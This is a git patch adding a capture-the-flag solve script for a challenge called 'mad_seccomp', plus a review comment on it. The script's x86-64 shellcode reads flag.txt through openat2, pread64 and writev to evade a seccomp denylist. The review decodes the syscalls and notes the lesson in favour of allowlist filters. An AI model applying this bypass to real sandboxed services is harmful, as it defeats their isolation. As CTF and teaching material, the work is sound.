From 4153f58c73f16d1b134e9ce2bb95a2316f14ea12 Mon Sep 17 00:00:00 2001
From: jc
Date: Mon, 28 Oct 2024 16:26:11 +0300
Subject: [PATCH] solve script
---
random_challs/mad_seccomp/a.py | 40 ++++++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 random_challs/mad_seccomp/a.py
diff --git a/random_challs/mad_seccomp/a.py b/random_challs/mad_seccomp/a.py
new file mode 100644
index 0000000..96a013b
--- /dev/null
+++ b/random_challs/mad_seccomp/a.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./mad_seccomp", checksec=False)
+r = process()
+
+# funcs
+s = lambda a: r.send(a)
+
+# shellcode
+sc = """
+lea rsi, [rax+108]
+lea rdx, [rax+200]
+mov QWORD PTR [rdx], 2
+mov QWORD PTR [rdx+16], 16
+mov rax, 437
+mov rdi, -100
+mov r10, 24
+syscall
+mov rdi, rax
+mov al, 17
+lea rsi, [rdx+100]
+mov rdx, 100
+sub r10b, r10b
+syscall
+lea r11, [rsi]
+mov QWORD PTR [rsi+100], r11
+mov QWORD PTR [rsi+108], rax
+mov rdi, 1
+lea rsi, [rsi+100]
+mov rdx, 1
+mov rax, 20
+syscall
+"""
+sc = asm(sc)
+sc += b"flag.txt\0"
+s(sc)
+
+r.interactive()
\ No newline at end of file
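Review bot: The assembly in `sc` is undocumented: it uses bare syscall numbers and offsets, so a reader cannot tell what the payload does or which gap in the filter it relies on. On x86-64 the numbers are `437` (openat2, with `rdi = -100` as AT_FDCWD and `r10 = 24` as the size of `struct open_how`), `17` (pread64) and `20` (writev); each `syscall` should be preceded by a comment such as `/* openat2(AT_FDCWD, "flag.txt", &how, 24) */`. The first instruction, `lea rsi, [rax+108]`, appears to assume that `rax` holds the shellcode address on entry and that the assembled code is exactly 108 bytes, so that the appended `flag.txt` sits at that offset; an `assert len(sc) == 108` right after `sc = asm(sc)` would make that explicit. The write-up should also state the defensive lesson: presumably the binary's seccomp filter denies the classic open/read/write numbers but not these newer equivalents, which is the usual argument for an allowlist filter over a denylist.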